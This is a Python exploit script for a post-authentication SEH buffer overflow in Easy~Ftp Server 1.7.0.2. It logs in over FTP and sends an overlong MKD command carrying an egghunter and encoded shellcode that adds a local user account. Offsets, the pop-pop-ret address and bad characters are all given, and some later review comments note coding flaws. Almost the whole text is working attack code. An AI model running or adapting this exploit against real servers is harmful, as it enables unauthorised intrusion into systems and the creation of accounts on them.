#!/usr/bin/python # Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF # Original Author: dookie2000ca || Windows XP SP3 Professional # Author: b33f # Windows XP Home SP1 # Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip import socket import sys #------------------------------------------------------------------------------- #SE Handler is overwritten - offset to SEH 256 #short jump \xEB\x07 #pop pop ret rpcrt4.dll 78011926 #badchars 0x00 0x0a 0x2f 0x5c #------------------------------------------------------------------------------- bunny = ( "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x77\x30\x30\x74" # egghunter marker w00t "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") #win32_adduser - PASS=u EXITFUNC=seh USER=fuck Size=228 Encoder=ShikataGaNai shellcode = ( "\xdb\xd3\x31\xc9\xb8\x5d\x82\xf8\x52\xb1\x34\xd9\x74\x24\xf4\x5f" "\x83\xc7\x04\x31\x47\x13\x03\x1a\x91\x1a\xa7\x58\x7d\x9e\x48\xa0" "\x7e\x94\x0c\x9c\xf5\xd6\x8b\xa4\x08\xc8\x1f\x1b\x13\x9d\x7f\x83" "\x22\x4a\x36\x48\x10\x07\xc8\xa0\x68\xd7\x52\x90\x0f\x17\x10\xef" "\xce\x52\xd4\xee\x12\x89\x13\xcb\xc6\x6a\xd8\x5e\x02\xf9\xbf\x84" "\xcd\x15\x59\x4f\xc1\xa2\x2d\x10\xc6\x35\xd9\x25\xea\xbe\x1c\xd2" "\x9a\x9d\x3a\x20\x5e\x2c\x83\x4c\xeb\x0f\x33\x09\x2b\xf7\x3f\x9a" "\xec\x04\xcb\xec\xf0\xb9\x40\x64\x01\x29\x5f\xff\x91\x1d\x60\xff" "\x91\xd6\x09\xc3\xce\xd9\x3f\x5b\xa7\x90\x38\x18\x87\xd8\xe8\x76" "\xf8\x95\x0d\xd9\x90\x31\xf3\x6f\x6e\x15\xf3\x88\x0c\xf4\x6f\x78" "\xb6\x7e\x15\xa4\x17\x1c\xf5\xca\x02\x96\xd5\x67\xbe\x33\x64\xa7" "\x26\xc9\xeb\xcc\x86\x44\xcc\x3d\x86\xe2\x48\x61\x2e\xcd\x70\x0f" "\x4b\x65\x51\xa3\xfc\xe6\xf0\x57\x64\x9b\x9d\xd2\x1a\x7b\x23\x78" "\xb6\x12\xcd\xe9\x3b\x91\x63\x88\xcf\x36\xf6\x39\x10\xaf\x83\xde" "\x3b\x0f\x43\x61\xf8\x0b\x9b") payload = "A"*7 + "w00tw00t" + shellcode + "A"*10 + "\xEB\x07\x90\x90" + "\x26\x19\x01\x78" + "\x90"*25 + bunny + "A"*133 
# FTP control session. The host and port, and the account used, are
# hard-coded by the author; credentials travel in clear text (plain FTP).
# Every server reply is read and discarded, so the script never checks
# whether USER/PASS or MKD were accepted.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.70',21))  # socket.connect() returns None; `connect` is never read
s.recv(1024)  # server banner
s.send('USER b33f\r\n')
s.recv(1024)
s.send('PASS b33f\r\n')  # post-auth bug: a valid login must precede the trigger
s.recv(1024)
# The overlong MKD argument is the trigger (see the payload layout above);
# a server or network log that records full FTP commands will contain it.
s.send('MKD ' + payload + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
# NOTE(review): `s.close` without parentheses only references the bound
# method and does nothing; the socket is not closed here and is released
# only when the interpreter exits.
s.close